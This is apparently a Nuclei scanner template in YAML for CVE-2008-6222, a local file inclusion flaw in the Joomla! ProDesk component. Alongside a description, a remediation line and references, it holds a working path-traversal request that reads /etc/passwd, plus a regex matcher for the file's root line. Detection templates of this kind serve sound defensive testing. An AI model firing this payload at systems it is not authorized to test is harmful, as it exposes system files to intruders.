44 lines
1.5 KiB
YAML
44 lines
1.5 KiB
YAML
id: CVE-2008-6222
|
|
|
|
info:
|
|
name: Joomla! ProDesk 1.0/1.2 - Local File Inclusion
|
|
author: daffainfo
|
|
severity: medium
|
|
description: Joomla! Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php.
|
|
remediation: |
|
|
Apply the latest security patches or upgrade to a patched version of Joomla! ProDesk to mitigate the vulnerability.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/6980
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2008-6222
|
|
- https://exchange.xforce.ibmcloud.com/vulnerabilities/46356
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
|
|
cvss-score: 5
|
|
cve-id: CVE-2008-6222
|
|
cwe-id: CWE-22
|
|
epss-score: 0.01029
|
|
epss-percentile: 0.82156
|
|
cpe: cpe:2.3:a:joomlashowroom:pro_desk_support_center:1.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: joomlashowroom
|
|
product: pro_desk_support_center
|
|
tags: cve2008,joomla,lfi,edb,cve
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4a0a004730450220591fba3d30c44fe9efb532eb2b8a0b9690762f238243eac54172193e15bd5a60022100e78a54cad180070b03e6e9da248eea25fcf5347a201851fd897f376b1a14ce77:922c64590222798bb761d5b6d8e72950
|